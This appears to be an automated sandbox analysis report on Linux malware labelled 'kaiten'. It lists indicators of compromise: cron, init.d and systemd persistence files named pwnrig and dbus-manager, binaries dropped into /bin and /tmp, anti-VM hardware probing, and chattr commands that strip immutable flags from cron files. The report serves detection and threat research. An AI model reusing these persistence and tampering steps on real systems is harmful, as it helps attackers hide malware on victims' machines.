kaiten | 80997198c6473f62efc3160cb8b4cb84d9bc7f7f3283f0e07ac3dc3ea2b66fbe

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/product_name	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/product_name	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/product_name	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b

Creates/modifies Cron job 1 TTPs 28 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

description	ioc	Process
File opened for modification	/etc/cron.daily/pwnrig	tee
File opened for modification	/var/spool/cron/crontabs/tmp.BECZyf	crontab
File opened for modification	/etc/cron.monthly/pwnrig	tee
File opened for modification	/etc/cron.daily/sedAagr6S	sed
File opened for modification	/etc/cron.weekly/sedybNQKn	sed
File opened for modification	/etc/cron.daily/dbus-manager	64f1b344-f61f-48c2-a67b-7f3fbb286f46
File opened for modification	/etc/cron.monthly/dbus-manager	64f1b344-f61f-48c2-a67b-7f3fbb286f46
File opened for modification	/etc/cron.d/pwnrig	tee
File opened for modification	/etc/cron.d/sedITQaWG	sed
File opened for modification	/etc/cron.monthly/sed2VG4rj	sed
File opened for modification	/etc/cron.d/sedqhiQsg	sed
File opened for modification	/etc/cron.d/dbus-manager	64f1b344-f61f-48c2-a67b-7f3fbb286f46
File opened for modification	/var/spool/cron/crontabs/tmp.51m6qA	crontab
File opened for modification	/etc/cron.d/pwnrig	tee
File opened for modification	/etc/cron.weekly/dbus-manager	64f1b344-f61f-48c2-a67b-7f3fbb286f46
File opened for modification	/etc/cron.hourly/sedE0nJFk	sed
File opened for modification	/etc/cron.weekly/pwnrig	tee
File opened for modification	/etc/cron.monthly/pwnrig	tee
File opened for modification	/etc/cron.weekly/pwnrig	tee
File opened for modification	/etc/cron.daily/sedKjuPQU	sed
File opened for modification	/etc/cron.monthly/sedo2Ad1W	sed
File opened for modification	/etc/cron.hourly/dbus-manager	64f1b344-f61f-48c2-a67b-7f3fbb286f46
File opened for modification	/etc/cron.daily/pwnrig	tee
File opened for modification	/etc/cron.hourly/pwnrig	tee
File opened for modification	/etc/cron.hourly/pwnrig	tee
File opened for modification	/etc/cron.hourly/sedgwctjb	sed
File opened for modification	/var/spool/cron/dbus-manager	64f1b344-f61f-48c2-a67b-7f3fbb286f46
File opened for modification	/etc/cron.weekly/sedymtHkZ	sed

Enumerates running processes
Discovers information about currently running processes on the system

Modifies init.d 1 TTPs 5 IoCs

Adds/modifies system service, likely for persistence.

persistence

Boot or Logon Autostart Execution

description	ioc	Process
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/sed0y3M27	sed
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/sed9U687R	sed
File opened for modification	/etc/init.d/dpkg-deb-package	64f1b344-f61f-48c2-a67b-7f3fbb286f46

Modifies systemd 1 TTPs 5 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

persistence

Boot or Logon Autostart Execution

description	ioc	Process
File opened for modification	/etc/systemd/system/dpkg-deb-package.service	64f1b344-f61f-48c2-a67b-7f3fbb286f46
File opened for modification	/lib/systemd/system/pwnrigl.service	tee
File opened for modification	/etc/systemd/system/pwnrige.service	tee
File opened for modification	/lib/systemd/system/pwnrigl.service	tee
File opened for modification	/etc/systemd/system/pwnrige.service	tee

Reads hardware information 1 TTPs 56 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/product_version	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/board_version	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/product_version	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/product_version	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/board_name	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/product_version	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/board_name	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/board_version	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/board_name	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/board_name	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/board_version	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/board_version	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b

Writes file to system bin folder 1 TTPs 9 IoCs

Hijack Execution Flow

description	ioc	Process
File opened for modification	/bin/dpkg-debian	64f1b344-f61f-48c2-a67b-7f3fbb286f46
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/sysdr	cp
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/sysdr	cp
File opened for modification	/bin/crondr	cp

Checks CPU configuration 1 TTPs 16 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

description	ioc	Process
File opened for reading	/proc/cpuinfo	ps
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	ps
File opened for reading	/proc/cpuinfo	ps
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	ps
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/proc/cpuinfo	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep

Reads CPU attributes 1 TTPs 24 IoCs

System Information Discovery

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/possible	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/system/cpu/types	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/system/cpu/possible	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/system/cpu/online	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/online	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/system/cpu/types	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/types	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/system/cpu/possible	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/types	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/system/cpu/online	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/online	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/system/cpu/possible	ps
File opened for reading	/sys/devices/system/cpu/possible	ps

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

description	ioc	Process
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/firmware/dmi/tables/DMI	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/dax/devices	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/node/devices/node0/cpumap	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/node/devices/node0/meminfo	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/dax/devices/target_node	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/fs/cgroup/cgroup.controllers	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/devices/system/node	ps
File opened for reading	/sys/devices/system/node/online	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/dax/devices	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/node/devices/node0/access0/initiators	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/node/devices/node0/hugepages	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/kernel/mm/transparent_hugepage/hpage_pmd_size	64f1b344-f61f-48c2-a67b-7f3fbb286f46
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/node/devices/node0/access0/initiators	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/level	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/node/devices/node0/cpumap	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/level	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for reading	/sys/devices/system/node	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/201/stat	ps
File opened for reading	/proc/2495/status	ps
File opened for reading	/proc/22/environ	ps
File opened for reading	/proc/39/stat	ps
File opened for reading	/proc/1803/environ	ps
File opened for reading	/proc/1394/ctty	ps
File opened for reading	/proc/2176/status	ps
File opened for reading	/proc/2316/status	ps
File opened for reading	/proc/2291/ctty	ps
File opened for reading	/proc/5/ctty	ps
File opened for reading	/proc/1943/status	ps
File opened for reading	/proc/sys/kernel/pid_max	ps
File opened for reading	/proc/1822/status	ps
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/2150/cmdline	ps
File opened for reading	/proc/1994/status	ps
File opened for reading	/proc/198/environ	ps
File opened for reading	/proc/1903/environ	ps
File opened for reading	/proc/2001/ctty	ps
File opened for reading	/proc/1822/status	ps
File opened for reading	/proc/7/ctty	ps
File opened for reading	/proc/1825/status	ps
File opened for reading	/proc/80/stat	ps
File opened for reading	/proc/389/cmdline	ps
File opened for reading	/proc/588/status	ps
File opened for reading	/proc/37/cmdline	ps
File opened for reading	/proc/190/environ	ps
File opened for reading	/proc/1986/stat	ps
File opened for reading	/proc/55/ctty	ps
File opened for reading	/proc/56/ctty	ps
File opened for reading	/proc/40/environ	ps
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/49/ctty	ps
File opened for reading	/proc/1857/cmdline	ps
File opened for reading	/proc/1957/cmdline	ps
File opened for reading	/proc/2616/stat	ps
File opened for reading	/proc/1943/environ	ps
File opened for reading	/proc/1803/status	ps
File opened for reading	/proc/50/status	ps
File opened for reading	/proc/1048/status	ps
File opened for reading	/proc/1703/environ	ps
File opened for reading	/proc/50/ctty	ps
File opened for reading	/proc/1721/status	ps
File opened for reading	/proc/773/cmdline	ps
File opened for reading	/proc/1125/status	ps
File opened for reading	/proc/1998/ctty	ps
File opened for reading	/proc/1969/status	ps
File opened for reading	/proc/1058/ctty	ps
File opened for reading	/proc/54/ctty	ps
File opened for reading	/proc/192/environ	ps
File opened for reading	/proc/2196/stat	ps
File opened for reading	/proc/2257/ctty	ps
File opened for reading	/proc/196/status	ps
File opened for reading	/proc/274/status	ps
File opened for reading	/proc/24/stat	ps
File opened for reading	/proc/1988/environ	ps
File opened for reading	/proc/18/status	ps
File opened for reading	/proc/49/ctty	ps
File opened for reading	/proc/383/cmdline	ps
File opened for reading	/proc/1822/ctty	ps
File opened for reading	/proc/1066/stat	ps
File opened for reading	/proc/32/cmdline	ps
File opened for reading	/proc/1965/environ	ps
File opened for reading	/proc/43/stat	ps

Writes file to tmp directory 12 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/d98da14b-7968-4d23-a486-fc796db13348	653b43fe3c86956d79be1c519628ab96
File opened for modification	/tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f	64f1b344-f61f-48c2-a67b-7f3fbb286f46
File opened for modification	/tmp/.lock	-bash-82c11f38-353d-49eb-b263-ceca8643985f
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/.bashirc	-python37-59bcbe28-2a35-4e11-824b-88ffcec00448
File opened for modification	/tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b	64f1b344-f61f-48c2-a67b-7f3fbb286f46
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/64f1b344-f61f-48c2-a67b-7f3fbb286f46	653b43fe3c86956d79be1c519628ab96
File opened for modification	/tmp/-python37-59bcbe28-2a35-4e11-824b-88ffcec00448	64f1b344-f61f-48c2-a67b-7f3fbb286f46
File opened for modification	/tmp/.lock	-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
File opened for modification	/tmp/-python37-89b070bb-bda2-479e-b1ab-1879f1acb90c	64f1b344-f61f-48c2-a67b-7f3fbb286f46
File opened for modification	/tmp/.bashirc	-python37-89b070bb-bda2-479e-b1ab-1879f1acb90c

/tmp/653b43fe3c86956d79be1c519628ab96
/tmp/653b43fe3c86956d79be1c519628ab96
1⤵
- Writes file to tmp directory
PID:2499

/tmp/64f1b344-f61f-48c2-a67b-7f3fbb286f46
"[kworker/R-debug] "
1⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2501
- /bin/chattr
  chattr -ia /etc/cron.d/.placeholder
  2⤵
  - Attempts to change immutable files
  PID:2525
- /bin/chattr
  chattr -ia /etc/cron.d/anacron
  2⤵
  - Attempts to change immutable files
  PID:2526
- /bin/chattr
  chattr -ia /etc/cron.d/e2scrub_all
  2⤵
  - Attempts to change immutable files
  PID:2528
- /bin/chattr
  chattr -ia /var/spool/cron/atjobs
  2⤵
  - Attempts to change immutable files
  PID:2529
- /bin/chattr
  chattr -ia /var/spool/cron/atspool
  2⤵
  - Attempts to change immutable files
  PID:2530
- /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f
  /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
  2⤵
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Writes file to tmp directory
  PID:2531
- - /bin/sh
